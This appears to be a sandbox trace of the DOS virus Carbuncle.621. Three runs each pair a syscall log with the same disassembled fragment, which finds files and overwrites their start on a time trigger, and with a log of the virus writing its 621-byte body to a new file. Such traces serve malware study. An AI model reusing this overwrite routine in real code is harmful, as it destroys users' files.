Sample viewer

vx.netlux.org/Virus.DOS.Carbuncle.621

Syscalls:

Time Syscall Op Syscall Name
2018-12-17T21:53:55.923461423Z 44 PC: 12a58 | Get time
0x12a58: cmp dh, 0x10
0x12a5b: jg 0x12a8c
0x12a5d: mov al, 5
0x12a5f: mov byte ptr [0x25a], al
0x12a62: mov ah, 0x4e
0x12a64: mov dx, 0x25b
0x12a67: int 0x21
0x12a69: jb 0x12a8c
0x12a6b: mov ax, 0x3d01
0x12a6e: mov dx, 0x9e
0x12a71: int 0x21
0x12a73: mov bh, 0x40
0x12a75: mov dx, 0x100
0x12a78: xchg ax, bx
0x12a79: mov cl, 0x2a
0x12a7b: int 0x21
0x12a7d: mov ah, 0x3e
0x12a7f: int 0x21
0x12a81: dec byte ptr [0x25a]
0x12a85: je 0x12a50
2018-12-17T21:53:55.926670879Z 60 PC: 12a96 | Create or truncate file
2018-12-17T21:53:55.947790682Z 64 PC: 12aa2 | Write file or device (Write 621 bytes on handle 5)
2018-12-17T21:53:55.95613328Z 62 PC: 12aa6 | Close file
2018-12-17T21:53:55.965953717Z 67 PC: 12ab1 | Get or set file attributes
2018-12-17T21:53:55.976277745Z 26 PC: 12ab8 | Set disk transfer address
2018-12-17T21:53:55.977661808Z 78 PC: 12abf | Find first file
2018-12-17T21:53:55.989230263Z 76 PC: 12a54 | Terminate with return code (Return code = '18')

{"DateBased":false,"Day":0,"Month":0,"Year":0,"Hour":0,"Min":0,"Second":0,"TimeBased":true,"OriginalID":420,"SideJobID":0}

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T11:40:53.602908234Z 44 PC: 12a58 | Get time
0x12a58: cmp dh, 0x10
0x12a5b: jg 0x12a8c
0x12a5d: mov al, 5
0x12a5f: mov byte ptr [0x25a], al
0x12a62: mov ah, 0x4e
0x12a64: mov dx, 0x25b
0x12a67: int 0x21
0x12a69: jb 0x12a8c
0x12a6b: mov ax, 0x3d01
0x12a6e: mov dx, 0x9e
0x12a71: int 0x21
0x12a73: mov bh, 0x40
0x12a75: mov dx, 0x100
0x12a78: xchg ax, bx
0x12a79: mov cl, 0x2a
0x12a7b: int 0x21
0x12a7d: mov ah, 0x3e
0x12a7f: int 0x21
0x12a81: dec byte ptr [0x25a]
0x12a85: je 0x12a50
2018-12-25T11:40:53.606327674Z 78 PC: 12a69 | Find first file
2018-12-25T11:40:53.612973637Z 60 PC: 12a96 | Create or truncate file
2018-12-25T11:40:53.804041216Z 64 PC: 12aa2 | Write file or device (Write 621 bytes on handle 5)
2018-12-25T11:40:53.824441381Z 62 PC: 12aa6 | Close file
2018-12-25T11:40:53.833975508Z 67 PC: 12ab1 | Get or set file attributes
2018-12-25T11:40:53.846558143Z 26 PC: 12ab8 | Set disk transfer address
2018-12-25T11:40:53.848270165Z 78 PC: 12abf | Find first file
2018-12-25T11:40:53.861558055Z 76 PC: 12a54 | Terminate with return code (Return code = '18')

{"DateBased":false,"Day":0,"Month":0,"Year":0,"Hour":0,"Min":0,"Second":17,"TimeBased":true,"OriginalID":420,"SideJobID":0}

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T11:40:53.62369706Z 44 PC: 12a58 | Get time
0x12a58: cmp dh, 0x10
0x12a5b: jg 0x12a8c
0x12a5d: mov al, 5
0x12a5f: mov byte ptr [0x25a], al
0x12a62: mov ah, 0x4e
0x12a64: mov dx, 0x25b
0x12a67: int 0x21
0x12a69: jb 0x12a8c
0x12a6b: mov ax, 0x3d01
0x12a6e: mov dx, 0x9e
0x12a71: int 0x21
0x12a73: mov bh, 0x40
0x12a75: mov dx, 0x100
0x12a78: xchg ax, bx
0x12a79: mov cl, 0x2a
0x12a7b: int 0x21
0x12a7d: mov ah, 0x3e
0x12a7f: int 0x21
0x12a81: dec byte ptr [0x25a]
0x12a85: je 0x12a50
2018-12-25T11:40:53.626125851Z 60 PC: 12a96 | Create or truncate file
2018-12-25T11:40:53.803899041Z 64 PC: 12aa2 | Write file or device (Write 621 bytes on handle 5)
2018-12-25T11:40:53.813367226Z 62 PC: 12aa6 | Close file
2018-12-25T11:40:53.823515204Z 67 PC: 12ab1 | Get or set file attributes
2018-12-25T11:40:53.835932557Z 26 PC: 12ab8 | Set disk transfer address
2018-12-25T11:40:53.837316001Z 78 PC: 12abf | Find first file
2018-12-25T11:40:53.847568847Z 76 PC: 12a54 | Terminate with return code (Return code = '18')